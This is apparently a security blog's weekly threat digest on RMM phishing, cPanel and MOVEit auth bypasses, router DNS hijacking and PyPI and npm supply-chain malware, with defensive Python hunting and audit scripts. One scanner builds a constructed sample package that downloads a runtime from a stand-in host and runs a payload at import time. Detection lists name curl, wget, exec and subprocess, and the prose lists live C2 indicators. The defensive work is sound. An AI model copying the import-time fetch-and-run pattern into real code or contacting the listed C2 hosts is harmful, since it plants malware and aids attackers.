EvilBit Threat Digest - Supply Chains That Keep on Giving

Dual-RMM phishing hits 80+ orgs, cPanel and MOVEit auth bypasses under active exploit, APT28 keeps hijacking routers for M365 token theft.


The past few days read like a greatest-hits album nobody asked for. Active supply-chain compromises, state actors abusing RMM tools at scale, a fresh wave of router hijacks, all in the same narrow window. If it feels like the same song on repeat, that's because the playlist hasn't changed much since the last edition. What's different this week is the pace. Exploitation is faster, and the same campaigns keep landing on Windows and Android together.

RMM Phishing and the Usual Suspects

Securonix tracked a campaign they're calling VENOMOUS#HELPER that has already hit more than 80 organizations, mostly in the US. The lure is a fake US Social Security Administration email asking the victim to verify an address and download a "statement." What gets installed isn't one RMM tool, it's two: a self-hosted SimpleHelp 5.0.1 instance paired with a ConnectWise ScreenConnect relay, giving the operators two independent access channels on every host (The Hacker News writeup has the full chain). Both binaries are vendor-signed, so SmartScreen and signature-based AV stay quiet.

The same TTPs keep working because defenders still treat RMM tools as benign by default. Hunt for unexpected SimpleHelp or ScreenConnect deployments on endpoints that never had them before, and treat any helpdesk_*.zip or Statement_*.exe attachment from an "SSA" sender as hostile. If random RMM tools can phone home from your environment without approval, you're one click away from a vendor-signed foothold that most endpoint controls will wave through. Ask your AppLocker / WDAC team whether SimpleHelp is on the allow-list by mistake, then revisit your RMM allow-list more broadly.
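The hunt described above, as an added example that is not Securonix's or any vendor's code: it runs over a handful of constructed Sysmon-style process-creation events, flags RMM clients on hosts that have no approval for that family, and raises severity when the parent is a mail client, browser or archiver (the phishing delivery path) rather than a service push. The binary-name patterns, the delivery-parent list and the per-host approval map are assumptions to tune to your own estate; the dual_rmm_hosts view is there because two independent channels on one host is exactly the pattern this campaign leaves.

```python
"""Hunt for unapproved RMM clients in process-creation telemetry.

Added example for this digest, not Securonix's or any vendor's code. Input is a
list of Sysmon-style process-creation events reduced to dicts. The binary-name
patterns, the delivery-parent list and the approval map are assumptions: tune
them to the RMM products you license and the hosts allowed to run them.
"""
import re

# RMM family -> regex over the lowercased image path. Assumed artefacts:
# SimpleHelp's remote-access client lives under a "JWrapper-Remote Access"
# directory; ScreenConnect clients are ScreenConnect.*.exe.
RMM_PATTERNS = {
    "simplehelp": re.compile(r"jwrapper-remote access\\|\\simplehelp[^\\]*\.exe$|\\remote access[^\\]*\.exe$"),
    "screenconnect": re.compile(r"\\screenconnect[^\\]*\.exe$"),
}

# Parents that mean a user opened something (mail client, browser, archiver),
# which fits the phishing delivery described, not an admin push. Assumption.
DELIVERY_PARENTS = re.compile(r"\\(outlook|chrome|msedge|firefox|explorer|7zfm|winrar)\.exe$")


def classify_image(image):
    """Return the RMM family for an image path, or None."""
    low = image.lower()
    for family, pattern in RMM_PATTERNS.items():
        if pattern.search(low):
            return family
    return None


def hunt_rmm(events, approved):
    """Return findings for RMM launches outside the allow-list.

    approved maps hostname -> set of permitted families; the "*" key is org-wide.
    """
    findings = []
    for ev in events:
        family = classify_image(ev["image"])
        if family is None:
            continue
        allowed = approved.get("*", set()) | approved.get(ev["host"], set())
        if family in allowed:
            continue
        user_driven = bool(DELIVERY_PARENTS.search(ev["parent"].lower()))
        findings.append({
            "host": ev["host"], "user": ev["user"], "family": family,
            "image": ev["image"], "parent": ev["parent"],
            "severity": "high" if user_driven else "medium",
        })
    return findings


def dual_rmm_hosts(findings):
    """Hosts with two or more unapproved RMM families: the dual-channel pattern."""
    per_host = {}
    for f in findings:
        per_host.setdefault(f["host"], set()).add(f["family"])
    return sorted(h for h, fams in per_host.items() if len(fams) >= 2)


# Constructed events, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS-0412", "user": r"corp\jdoe",
     "image": r"C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\Remote Access.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"host": "WS-0412", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe",
     "parent": r"C:\Windows\System32\services.exe"},
    {"host": "SRV-IT01", "user": r"corp\helpdesk",
     "image": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe",
     "parent": r"C:\Windows\System32\services.exe"},
    {"host": "WS-0412", "user": r"corp\jdoe",
     "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe"},
]
APPROVED = {"SRV-IT01": {"screenconnect"}}  # assumption: IT's jump host may run it

if __name__ == "__main__":
    hits = hunt_rmm(SAMPLE_EVENTS, APPROVED)
    for h in hits:
        print(h["severity"], h["host"], h["family"], h["image"])
    print("dual-RMM hosts:", dual_rmm_hosts(hits))
```

Feed it your real process-creation stream and a populated allow-list; anything that lands in dual_rmm_hosts deserves an isolate-first response, not a ticket.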

cPanel and MOVEit: The Auth-Bypass Double Feature

CVE-2026-41940 in cPanel & WHM, and in the related WordPress Squared (WP2) product, is getting hammered in the wild. CVSS 9.8. The bug is a CRLF injection in the login and session-loading path that hands an unauthenticated attacker a fully authenticated root admin session in a single request. CISA added it to the Known Exploited Vulnerabilities catalog on May 1 with a federal-agency deadline of May 3 that has already passed. cPanel pushed fixes on April 28 across seven supported branches: 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5, and WP Squared 136.1.7. Anything below those builds is low-hanging fruit, and exploitation has been observed in the wild since late February, so the bug was effectively a two-month zero-day before fixes shipped. Cato's threat brief has the technical writeup.

The same week brought CVE-2026-4670 (auth bypass, CVSS 9.8) and CVE-2026-5174 (improper input validation, CVSS 7.7) in Progress Software's MOVEit Automation. On its own, only CVE-2026-4670 lets an unauthenticated remote attacker in; CVE-2026-5174 is a privilege-escalation issue that needs a foothold first. Chained, they hand over administrative control of MOVEit Automation, including credentials stored in tasks. Fixed versions: 2025.1.5, 2025.0.9, 2024.1.8, and newer (BleepingComputer's coverage has the upgrade procedure, including the unavoidable outage during the full-installer upgrade).
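A triage helper for both products, added here as an example and not vendor code: it takes an inventory of (host, product, version) and classifies each version against the fixed builds quoted above. The fixed-build lists are the ones in this digest; the rule that the first two version components identify a branch, and the sample inventory, are assumptions. The useful edge is the "unsupported" bucket: a branch with no fixed build listed has nothing to patch to and should be treated as vulnerable until it is upgraded.

```python
"""Triage cPanel & WHM, WP Squared and MOVEit Automation versions against the
fixed builds quoted in this digest.

Added example, not vendor code. The fixed-build lists are copied from the
digest; the branch rule (first two version components identify a branch) and
the sample inventory are assumptions.
"""

FIXED = {
    "cpanel": ["11.110.0.97", "11.118.0.63", "11.126.0.54",
               "11.132.0.29", "11.134.0.20", "11.136.0.5"],
    "wp_squared": ["136.1.7"],
    "moveit_automation": ["2024.1.8", "2025.0.9", "2025.1.5"],
}
BRANCH_LEN = 2  # 11.110.x.y -> branch 11.110; 2025.1.x -> branch 2025.1


def parse_version(text):
    return tuple(int(part) for part in text.strip().split("."))


def assess(product, version):
    """Classify one version string.

    patched      same branch as a fixed build and at or above it
    vulnerable   same branch as a fixed build but below it
    unsupported  branch has no fixed build and is not newer than the list:
                 nothing to patch to, upgrade the branch
    unknown      branch newer than anything listed here: verify with the vendor
    """
    v = parse_version(version)
    branch = v[:BRANCH_LEN]
    fixed = [parse_version(f) for f in FIXED[product]]
    for f in fixed:
        if f[:BRANCH_LEN] == branch:
            return "patched" if v >= f else "vulnerable"
    newest = max(f[:BRANCH_LEN] for f in fixed)
    return "unknown" if branch > newest else "unsupported"


def triage(inventory):
    """inventory: iterable of (host, product, version). Worst first."""
    order = {"vulnerable": 0, "unsupported": 1, "unknown": 2, "patched": 3}
    rows = [(host, product, version, assess(product, version))
            for host, product, version in inventory]
    return sorted(rows, key=lambda r: order[r[3]])


# Constructed inventory.
SAMPLE_INVENTORY = [
    ("web-01", "cpanel", "11.126.0.50"),
    ("web-02", "cpanel", "11.136.0.7"),
    ("web-03", "cpanel", "11.108.0.15"),
    ("wp-01", "wp_squared", "136.1.7"),
    ("mft-01", "moveit_automation", "2025.1.4"),
    ("mft-02", "moveit_automation", "2024.1.8"),
]

if __name__ == "__main__":
    for row in triage(SAMPLE_INVENTORY):
        print(*row)
```

Swap in the version strings your CMDB or scanner reports and the list sorts itself into patch-now, upgrade-branch, verify-with-vendor and done.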

Hunting note: same shape we keep seeing. Public-facing file-transfer and management products are the first domino, every time. Block external access to management interfaces where you can. For cPanel, check whostmgrsession cookie patterns and any session files on disk that show hasroot=1 for accounts that didn't log in interactively. For MOVEit, treat any unexpected admin-account creation or new task definition as a compromise until proven otherwise. Tenable plugins for both shipped inside 24 hours, so your VM team already has coverage; just confirm the scan policies actually run.

Prioritize these the same way you did the last round of internet-facing auth bypasses.

Russian Router Campaign and Office Token Theft

KrebsOnSecurity reported that APT28 (GRU-linked, also tracked as Forest Blizzard) has been systematically compromising MikroTik and TP-Link SOHO routers to hijack DNS and steal Microsoft Office authentication tokens. At its December 2025 peak, the operation had roughly 18,000 routers under its control, most of them end-of-life or far behind on patches. The TP-Link WR841N path leans on CVE-2023-50224, an information-disclosure bug, after which a follow-up GET rewrites the router's DHCP DNS settings to attacker-controlled resolvers. From there, lookups for Microsoft login domains get steered to attacker infrastructure that intercepts OAuth flows (NCSC's joint advisory has the full IOC list).

Primary targets per NCSC and the FBI's IC3 PSA were government agencies, including ministries of foreign affairs and law enforcement. That doesn't mean the rest of us get a pass. The tactic is elegant, and any M365-heavy shop with consumer-grade edge gear is in scope. Rotate any Office-related tokens that touched a compromised network segment, retire unsupported MikroTik and TP-Link gear at the perimeter, and watch for unexpected DNS or firmware changes on the edge devices you keep.
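Two checks for the "watch for unexpected DNS changes" advice above, added here as an example and not code from KrebsOnSecurity, NCSC or the FBI. The first flags DHCP-offered resolvers that are neither the router itself nor on your approved list; the second compares what the LAN resolver returns for the Microsoft sign-in names against a trusted resolver and flags names whose answer sets share no address at all. The watch-domain list, the approved-resolver set and every address below are constructed assumptions (RFC 5737 documentation ranges), not the advisory's IOCs; in practice you fill the answer dicts by querying both resolvers for the same names.

```python
"""Two checks for the router-level DNS hijack pattern described above.

Added example for this digest, not code from KrebsOnSecurity, NCSC or the FBI.
The watch-domain list, the approved-resolver set and all sample answers are
constructed assumptions (RFC 5737 documentation addresses), not the advisory's
IOCs. In practice the answer dicts are filled by querying the DHCP-offered
resolver and a trusted one (for example over DoH) for the same names.
"""
import ipaddress

# Names whose hijack lets an attacker sit in front of the Microsoft sign-in flow.
WATCH_DOMAINS = ["login.microsoftonline.com", "login.live.com", "login.microsoft.com"]


def check_resolvers(dhcp_dns, lan_cidr, approved_resolvers):
    """Flag DHCP-offered DNS servers that are neither on the LAN (the router
    itself forwarding) nor in the approved set. Returns the offending addresses."""
    lan = ipaddress.ip_network(lan_cidr)
    approved = {ipaddress.ip_address(a) for a in approved_resolvers}
    bad = []
    for server in dhcp_dns:
        addr = ipaddress.ip_address(server)
        if addr in lan or addr in approved:
            continue
        bad.append(str(addr))
    return bad


def compare_answers(lan_answers, trusted_answers, domains=WATCH_DOMAINS):
    """Flag domains where the LAN resolver's answers share no address with the
    trusted resolver's. Both inputs map name -> set of IPs. CDN and anycast
    names legitimately differ per resolver, which is why this compares
    overlap rather than equality and why the watch list is kept short."""
    diverged = []
    for name in domains:
        lan = {ipaddress.ip_address(a) for a in lan_answers.get(name, ())}
        trusted = {ipaddress.ip_address(a) for a in trusted_answers.get(name, ())}
        if not lan:
            diverged.append((name, "no answer from LAN resolver"))
        elif lan.isdisjoint(trusted):
            diverged.append((name, "answers " + ", ".join(sorted(map(str, lan)))))
    return diverged


# Constructed sample data.
DHCP_DNS = ["192.168.88.1", "198.51.100.53"]   # router, plus a pushed rogue
LAN = "192.168.88.0/24"
APPROVED = {"192.0.2.53"}                       # assumption: the org's own forwarder
TRUSTED = {"login.microsoftonline.com": {"203.0.113.10", "203.0.113.11"},
           "login.live.com": {"203.0.113.20"},
           "login.microsoft.com": {"203.0.113.30"}}
FROM_LAN = {"login.microsoftonline.com": {"198.51.100.7"},            # steered
            "login.live.com": {"203.0.113.20", "203.0.113.21"},       # overlaps: fine
            "login.microsoft.com": {"203.0.113.30"}}

if __name__ == "__main__":
    print("rogue resolvers:", check_resolvers(DHCP_DNS, LAN, APPROVED))
    for name, why in compare_answers(FROM_LAN, TRUSTED):
        print("diverged:", name, why)
```

Run the resolver check against the DHCP lease your own laptop picks up on each office or home segment you care about; a resolver outside the LAN and outside your approved set is exactly what the hijacked routers push.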

The PyPI and NPM Supply-Chain Sideshow

AI developers continue to be a favorite target. A malicious PyTorch Lightning package (lightning versions 2.6.2 and 2.6.3, both published April 30) shipped a hidden _runtime directory that pulled the Bun JavaScript runtime from GitHub at import time and used it to execute an obfuscated, ~11 MB credential stealer (Snyk's analysis walks the chain; BleepingComputer has the wider context). Execution happened the moment lightning was imported, no extra step required. Targets included GitHub and npm tokens, SSH keys, cloud and Kubernetes creds, Vault, Docker creds, .env files, and crypto wallets. The malicious versions have been removed from PyPI; the latest safe release is 2.6.1. Treat anything that ran 2.6.2 or 2.6.3 as compromised: rotate every credential that touched the build runner and scan for stealer artifacts.
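The thing that made this package dangerous is that the download and execution sat at module scope, so "import lightning" was the trigger. The scanner below, an added example and not Snyk's tooling or anything shipped by the lightning project, walks a package's .py files and reports calls that run at import time and reach for the network, a subprocess or exec/eval, while ignoring the same calls inside function and class bodies (those only run when called). The suspicious-call table is an assumption, and the sample package it writes to a temp directory is constructed to resemble the shape described (fetch a runtime, run a blob, at import); it is parsed, never executed.

```python
"""Find code in a Python package that runs at import time and touches the
network, a subprocess or exec/eval.

Added example for this digest, not Snyk's tooling or code from the lightning
project. The suspicious-call table is an assumption; the sample package built
below is constructed to resemble the shape described (an import-time download
of a runtime that then runs a blob) and is only parsed, never executed.
"""
import ast
import os
import tempfile
import textwrap

SUSPICIOUS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get",
    "socket.socket", "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "os.system", "os.popen", "os.execv", "os.execvp",
    "exec", "eval", "ctypes.CDLL",
}
SCOPES = (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef, ast.Lambda)


def import_time_nodes(node):
    """Yield nodes that execute on import, skipping function/class/lambda bodies."""
    for child in ast.iter_child_nodes(node):
        if isinstance(child, SCOPES):
            continue
        yield child
        yield from import_time_nodes(child)


def dotted_name(func):
    """'sp.run' for attribute chains, 'exec' for bare names, else None."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return None


def scan_source(source):
    """Return [(line, resolved_call)] for suspicious calls reachable at import."""
    tree = ast.parse(source)
    aliases = {}  # local name -> qualified name, from import statements
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = node.module + "." + a.name
    findings = []
    for node in import_time_nodes(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name:
                head, sep, rest = name.partition(".")
                resolved = aliases.get(head, head) + sep + rest
                if resolved in SUSPICIOUS:
                    findings.append((node.lineno, resolved))
    return findings


def scan_package(root):
    """Map each .py file under root (posix-style relative path) to its findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.endswith(".py"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8") as fh:
                    rel = os.path.relpath(path, root).replace(os.sep, "/")
                    report[rel] = scan_source(fh.read())
    return report


def build_sample_package():
    """Write a constructed package to a temp dir and return the dir (never imported)."""
    root = tempfile.mkdtemp(prefix="pkgscan-")
    pkg = os.path.join(root, "badpkg")
    os.makedirs(os.path.join(pkg, "_runtime"))
    with open(os.path.join(pkg, "__init__.py"), "w", encoding="utf-8") as fh:
        fh.write(textwrap.dedent('''\
            import os
            import subprocess as sp
            from urllib.request import urlretrieve

            _HERE = os.path.join(os.path.dirname(__file__), "_runtime")
            # constructed URL; this file is only ever parsed by the scanner
            urlretrieve("https://example.invalid/runtime.zip", os.path.join(_HERE, "rt.zip"))
            sp.run([os.path.join(_HERE, "rt"), os.path.join(_HERE, "stage2.js")])

            def train(model):
                return model
            '''))
    with open(os.path.join(pkg, "utils.py"), "w", encoding="utf-8") as fh:
        fh.write(textwrap.dedent('''\
            import subprocess

            def gpu_info():
                # inside a function: not reached at import time
                return subprocess.check_output(["nvidia-smi"])
            '''))
    return root


if __name__ == "__main__":
    for rel, hits in scan_package(build_sample_package()).items():
        print(rel, hits)
```

Point scan_package at the unpacked wheel or the site-packages directory on a build runner before the first import; anything it reports at module scope in a library that has no business doing network or process work on import is a stop-the-line finding.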

On the Node.js side, PhantomRaven Wave 5 (Mend.io's research) dropped 33 malicious NPM packages aimed at DeFi, cloud, and AI developers. The packages use a three-stage Remote Dynamic Dependency loader that phones home to live C2, then exfiltrates developer identity, email, CI/CD tokens, GitHub repo names, and public IPs. As of Mend's writeup, all 33 packages were still live on NPM and the C2 was still answering, so this is not an after-the-fact cleanup, it's a hunt-now problem. The usual advice still applies: npm install --ignore-scripts, audit for external HTTP dependencies, block the published C2 indicators, and treat any package that pulls a runtime at install or import time as hostile by default.
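The "audit for external HTTP dependencies" step, as an added example that is not Mend.io's tooling: a remote-dynamic-dependency loader needs a dependency that resolves somewhere other than the registry, an install-time script, or both, and those two facts are visible in package.json and the lockfile before anything is installed. The manifest and lockfile below are constructed, and the approved-registry host list is an assumption to extend with your mirror.

```python
"""Audit an npm package.json and lockfile for non-registry dependencies and
install-time scripts, the two hooks a remote-dynamic-dependency loader needs.

Added example for this digest, not Mend.io's tooling. The sample manifest and
lockfile are constructed; the approved-registry host list is an assumption.
"""
import re
from urllib.parse import urlparse

INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
DEP_FIELDS = ("dependencies", "devDependencies", "optionalDependencies")
APPROVED_REGISTRIES = {"registry.npmjs.org"}  # add your internal mirror here
GITHUB_SHORTHAND = re.compile(r"^[\w.-]+/[\w.-]+(#.*)?$")  # "user/repo[#ref]"
SCRIPT_FETCHERS = re.compile(r"\b(curl|wget|Invoke-WebRequest|node\s+-e)\b")


def classify_spec(spec):
    """Where a dependency spec is fetched from."""
    if spec.startswith(("http://", "https://")):
        return "remote-url"
    if spec.startswith(("git+", "git://", "github:", "gitlab:", "bitbucket:")):
        return "git"
    if spec.startswith("file:"):
        return "file"
    if spec.startswith("npm:"):
        return "alias"
    if GITHUB_SHORTHAND.match(spec):
        return "git"
    return "registry"


def audit_manifest(manifest):
    """Return findings as (kind, detail) tuples, dependencies first, then hooks."""
    findings = []
    for field in DEP_FIELDS:
        for name, spec in manifest.get(field, {}).items():
            kind = classify_spec(spec)
            if kind in ("remote-url", "git"):
                findings.append(("non-registry dependency", f"{field}: {name} -> {spec}"))
    scripts = manifest.get("scripts", {})
    for hook in sorted(INSTALL_HOOKS & scripts.keys()):
        cmd = scripts[hook]
        kind = "install hook fetches remotely" if SCRIPT_FETCHERS.search(cmd) else "install hook"
        findings.append((kind, f"{hook}: {cmd}"))
    return findings


def audit_lockfile(lock):
    """lockfileVersion 2/3: flag resolved tarballs not served by an approved registry."""
    findings = []
    for path, entry in lock.get("packages", {}).items():
        resolved = entry.get("resolved")
        if not path or not resolved:
            continue  # root entry, or a link/file dependency with no URL
        host = urlparse(resolved).hostname
        if host not in APPROVED_REGISTRIES:
            findings.append(("non-registry tarball", f"{path} <- {resolved}"))
    return findings


# Constructed manifest and lockfile.
SAMPLE_MANIFEST = {
    "name": "dex-dashboard", "version": "0.1.0",
    "dependencies": {
        "lodash": "^4.17.21",
        "web3-helper": "https://cdn.example.invalid/web3-helper-1.0.0.tgz",
        "dex-utils": "github:someorg/dex-utils",
        "shared": "file:../shared",
    },
    "scripts": {"postinstall": "node -e \"require('./setup')\"", "test": "jest"},
}
SAMPLE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "dex-dashboard"},
        "node_modules/lodash": {"resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz"},
        "node_modules/web3-helper": {"resolved": "https://cdn.example.invalid/web3-helper-1.0.0.tgz"},
    },
}

if __name__ == "__main__":
    for kind, detail in audit_manifest(SAMPLE_MANIFEST) + audit_lockfile(SAMPLE_LOCK):
        print(f"{kind}: {detail}")
```

Run it in CI against every package.json and package-lock.json in the tree; the lockfile pass catches a registry-looking spec in the manifest that the lock has quietly pinned to a tarball on someone else's host.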

New North Korean Supply-Chain Play

ESET detailed a fresh ScarCruft (APT37) operation that compromised the sqgame.net gaming platform, popular with ethnic Koreans in China's Yanbian prefecture. The attackers trojanized the Windows client and at least two Android games (延边红十 / Yanbian Red Ten and 新画图 / New Drawing), dropping RokRAT on Windows, which then pulled down the BirdCall backdoor. The Android version of BirdCall vacuums up contacts, SMS, call logs, documents, media, private keys, screenshots, and ambient audio. The goal is the usual ScarCruft program: surveil a specific diaspora.

If you're pulling software from a niche or community platform, the platform is your supply chain. These binaries came through the platform's own download channel, which is exactly why they passed whatever casual integrity checks users were doing. App-store and signed update channels exist for a reason; sideloading from a community site burns whatever assurance you had left.

DAEMON Tools Installers Still Bleeding

Kaspersky's Securelist published details on a supply-chain compromise in which official DAEMON Tools Lite installers, versions 12.5.0.2421 through 12.5.0.2434, have been trojanized since at least April 8. The signed binaries (specifically DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe) beacon to a typosquatted domain, profile the victim, then drop an info stealer, backdoor, and a QUIC-based RAT on a small subset of high-value targets. The C2 stack supports HTTP, UDP, TCP, WSS, QUIC, DNS, and HTTP/3, with payloads injected into notepad.exe and conhost.exe. Roughly 10% of infections landed on org-managed hosts; the rest were home users across about a hundred countries.

Block the listed C2 infrastructure (env-check.daemontools.cc, 38.180.107.76) and treat any DAEMON Tools install from that date range as suspicious until proven clean. Code-signing trust is doing a lot of work here that it shouldn't have to do alone.

Other items I'm tracking

  • The San Diego Community College District is still recovering from a confirmed cyberattack that knocked out internet, email, websites, and registration systems for a district that serves roughly 90,000 students. No data loss reported yet, but the timing during the spring-semester home stretch is painful.
  • A new Mirai variant, xlabs_v1 (operator handle Tadashi), is hijacking ADB-exposed Android and IoT devices on TCP/5555 for DDoS-for-hire attacks aimed at Minecraft and other game servers. C2 is at xlabslover.lol:35342, with a fallback listener on TCP/26721. Hunt.io's research notes 4M+ hosts globally still expose ADB. Disable it; it is 2026, and this joke should have ended years ago.
  • Cisco open-sourced a Model Provenance Kit for fingerprinting AI models. Useful if you're ingesting anything from Hugging Face and want to know if it changed between download and deployment.
  • Another insider-risk story to pair with last edition's BlackCat sentencing: a former ransomware-negotiator-turned-Karakurt-affiliate drew 8.5 years. Privileged accounts touching IR engagements deserve the same SoD scrutiny as any other admin role.
  • Cisco Talos profiled UAT-8302, a previously-undocumented actor with a broad malware portfolio worth running through your detection-engineering backlog.
  • CIO published a longer piece on the DPRK fake-IT-worker problem. HR + IT controls (camera-on interviews, geo-anchored access, hardware shipped only to verified addresses) keep showing up as the cheapest mitigations.
  • Foxconn's Wisconsin plant outage is still raising cyber questions. Worth tracking if your supply chain runs through US-based manufacturing.

The pattern this week is trust. Package registries, RMM tools, that router nobody remembered owning. Every layer that "just works" without oversight becomes another vector.

If nothing else, treat this week as a reminder to revisit your software bill of materials and your RMM allow-list. The attackers certainly have.

Trust the weave you built, not the one you inherited.

~ UncleSp1d3r